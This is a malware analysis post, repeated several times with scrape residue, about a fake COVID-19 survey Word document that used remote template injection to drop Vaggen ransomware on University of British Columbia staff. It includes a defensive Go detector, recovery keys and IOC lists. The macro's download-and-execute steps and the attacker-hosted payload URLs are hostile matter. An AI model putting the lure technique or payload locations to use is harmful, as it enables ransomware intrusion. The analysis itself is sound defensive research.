After being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop demanding a payment equivalent to 80 USD, to be paid in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go, which starts with the function denoted as ‘main_main’.

Other functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.

main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware (i.e. the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.

Encrypting and renaming the files is implemented as the callback of the standard Go function filepath.Walk (from the path/filepath package).

Files are encrypted with AES-256 (32-byte key) in GCM mode.

The encryption algorithm is similar to the one demonstrated here.
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 73 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 74 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 75 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 76 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 77 of 
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.

In recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.

However, this attack and its motives are different from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims to recover their encrypted files.

On discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.

Mandatory COVID-19 survey distributed to targeted recipients

The attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and Dropbox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto Box and Dropbox and used the share functionality of these platforms to distribute it.

This was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from file sharing services without creating a number of false positives.

The attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):

Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more. Please fill it out ASAP!

You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!

In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!

According to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file since it was shared privately instead of publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.

Phishing document analysis

The phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro.
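A defender-side triage check for the template injection just described, added here as an example and not part of the original post: it opens a .docx as the zip container it is, reads word/_rels/settings.xml.rels and reports any attachedTemplate relationship marked External. The relationship type and part name are the standard OOXML ones; the sample document and its remote.example URL are constructed for the test and stand in for the real host.

```go
package main

import (
	"archive/zip"
	"bytes"
	"encoding/xml"
	"fmt"
	"os"
	"strings"
)

// Word records the template a document is attached to as a relationship of word/settings.xml.
// A local template is a plain file Target; with TargetMode="External" the Target is a URL that
// Word fetches when the document opens and whose macros then run. That is the remote-template
// injection described above, so this one relationship file is where a triage check should look.
const settingsRels = "word/_rels/settings.xml.rels"

// Parsed shape of settings.xml.rels, reduced to the attributes the check needs.
type relationships struct {
	Rels []struct {
		Type       string `xml:"Type,attr"`
		Target     string `xml:"Target,attr"`
		TargetMode string `xml:"TargetMode,attr"`
	} `xml:"Relationship"`
}

// RemoteTemplates returns the external attachedTemplate targets found in a .docx (a zip
// container). An empty result means the document does not pull its template from elsewhere.
func RemoteTemplates(docx []byte) ([]string, error) {
	zr, err := zip.NewReader(bytes.NewReader(docx), int64(len(docx)))
	if err != nil {
		return nil, fmt.Errorf("not a valid OOXML/zip container: %w", err)
	}
	var found []string
	for _, f := range zr.File {
		if f.Name != settingsRels {
			continue
		}
		rc, err := f.Open()
		if err != nil {
			return nil, err
		}
		defer rc.Close()
		var rels relationships
		if err := xml.NewDecoder(rc).Decode(&rels); err != nil {
			return nil, fmt.Errorf("%s: %w", settingsRels, err)
		}
		for _, r := range rels.Rels {
			if strings.HasSuffix(r.Type, "/attachedTemplate") && r.TargetMode == "External" {
				found = append(found, r.Target)
			}
		}
	}
	return found, nil
}

// buildSampleDocx constructs a minimal container holding only the part the check reads.
// An empty target yields a document attached to a local Normal.dotm instead.
func buildSampleDocx(target string) ([]byte, error) {
	const relType = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
	rel := fmt.Sprintf(`<Relationship Id="rId1" Type="%s" Target="Normal.dotm"/>`, relType)
	if target != "" {
		rel = fmt.Sprintf(`<Relationship Id="rId1" Type="%s" Target="%s" TargetMode="External"/>`, relType, target)
	}
	body := `<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">` + rel + `</Relationships>`
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	w, err := zw.Create(settingsRels)
	if err != nil {
		return nil, err
	}
	if _, err := w.Write([]byte(body)); err != nil {
		return nil, err
	}
	if err := zw.Close(); err != nil {
		return nil, err
	}
	return buf.Bytes(), nil
}

// Usage: go run . <file.docx>
func main() {
	if len(os.Args) != 2 {
		fmt.Fprintln(os.Stderr, "usage: go run . <file.docx>")
		os.Exit(2)
	}
	data, err := os.ReadFile(os.Args[1])
	var targets []string
	if err == nil {
		targets, err = RemoteTemplates(data)
	}
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	fmt.Printf("%d remote template relationship(s): %q\n", len(targets), targets)
}
```

The check only covers the attached-template relationship; a document can also reach out through other External relationships, which a fuller scanner would list as well.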
That file was uploaded to a free code hosting website (notabug.org).

When the macro is executed, it does the following:

- Gets the %APPDATA% directory
- Creates the Byxor directory in %APPDATA%
- Downloads a file from the following URL and writes it as Polisen.exe:
  notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
- Downloads a file from the following URL and writes it as Killar.exe:
  notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
- Calls the shell function to execute killar.exe
- Checks the output of the shell function and whether it was successful (the return value would be the task ID of the executed application)
- If successful, it sends a GET HTTP request to:
  canarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
- If it isn’t successful, it sends a GET HTTP request to:
  canarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted for a particular event. This can be very useful as an early warning notification system that an intruder has had access to a network.
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.

Vaggen ransomware

After being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as ‘main_main’.

Other functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA. Three of these could be mapped to their actual roles:

main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware (i.e. the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.

Encrypting and renaming of the files is implemented as the callback of the standard Go library function filepath.Walk (package path/filepath).

Files are encrypted with AES-256 (32-byte key) in GCM mode. The encryption algorithm is similar to the one demonstrated here: it uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom, and the file content is encrypted with the gcm.Seal function.

The output file (with .VAGGEN extension) contains:

- the 12-byte nonce
- the encrypted content
- the 16-byte GCM tag

The hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content.

With all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.

Unusually low ransom amount

Based on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.

However, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.

Crawling additional repositories created by the threat actor, we found other Word template files that have used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.

We are grateful for the information shared with us by the University of British Columbia.
This allowed us to paint a better picture of this attack and understand who the targets were.

Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 107 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 108 of 
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.
In recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group.
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.
However, this attack and its motives differ from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims to recover their encrypted files.
On discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful thanks to the rapid response of the UBC cybersecurity team.
Mandatory COVID-19 survey distributed to targeted recipients
The attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and Dropbox. Rather than sending the fake survey directly via email, the attacker uploaded the document to Box and Dropbox and used the share functionality of these platforms to distribute it.
This was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much harder to flag sharing invitations sent by legitimate file sharing services without creating a number of false positives.
The attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):
Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more.
Please fill it out ASAP!
You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!
In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!
According to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required to download the file, since it was shared privately rather than publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.
Phishing document analysis
The phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro.
That file was uploaded to a free code hosting website (notabug.org).
When the macro is executed, it does the following:
Gets the %APPDATA% directory
Creates the Byxor directory in %APPDATA%
Downloads a file from the following URL and writes it as Polisen.exe:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
Downloads a file from the following URL and writes it as Killar.exe:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
Calls the Shell function to execute killar.exe
Checks the return value of Shell to see whether the launch succeeded (on success, Shell returns the task ID of the started process)
If successful, it sends an HTTP GET request to:
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
If it isn’t successful, it sends an HTTP GET request to:
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.
Opening the phishing document with macros enabled will trigger a notification via the canarytokens.com website. Typically, defenders use this type of service to get alerted when a particular event occurs; it can serve as an early warning that an intruder has gained access to a network.
In this case, the attacker is probably interested in how many people opened the document, whether the payload launched (the success and failure tokens are distinct), and perhaps where the victims are located.
Vaggen ransomware
Once deployed, the ransomware encrypts the user’s files, appending the .VAGGEN extension to each of them. When the encryption process is finished, it drops a ransom note on the Desktop demanding a payment equivalent to 80 USD in Bitcoin.
The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go, starting from the function denoted as ‘main_main’.
Other functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA. The ones we identified map to the following purposes:
main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen
A full list of the functions, along with their RVAs, can be found here.
Some of the strings used by the malware (e.g. the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64, then decrypted with the hardcoded XXTEA key (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.
Encrypting and renaming the files is implemented as the callback passed to the standard Go library function filepath.Walk (package path/filepath).
Files are encrypted with AES-256 (32-byte key) in GCM mode.
The encryption algorithm is similar to the one demonstrated here.
It uses the hardcoded key and a 12-byte nonce generated by CryptGenRandom; the file content is encrypted with the gcm.Seal function.
The output file (with .VAGGEN extension) contains, in order:
the 12-byte nonce
the encrypted content
the 16-byte GCM tag
The hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart, my money”; it is exactly 32 characters long, which is what selects AES-256. Using this key, we can easily decrypt the content.
With all these elements (a static key, plus the nonce and tag stored in clear in every file), we can recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.
Unusually low ransom amount
Based on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.
However, the phishing attack was well conceived and the template looks well designed, with a nice touch in the use of canary tokens. It’s unclear at this point whether the University of British Columbia was the sole target.
Crawling additional repositories created by the threat actor, we found other Word template files that used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.
We are grateful for the information shared with us by the University of British Columbia.
This allowed us to paint a better picture of this attack and understand who the targets were.
Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.
IOCs
Variant1:
summerofficetemplate.dotm
634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe
Variant2:
UBC-COVID19-Survey-Mandatory.docx
e869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3
template.dotm
334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
polisen.exe
03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf
killar.exe
43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f
Variant3:
template1.dotm
225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4
notabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe
notabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe
canarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php
canarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp
Variant4:
smoothtemplates.dotm
ada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
b4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe
Variant5:
template.dotm
7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe
canarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp
canarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php
mrmonster.exe
f42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23
mrclean.exe
71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a
Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 122 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 123 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 124 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 125 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 126 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 127 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a 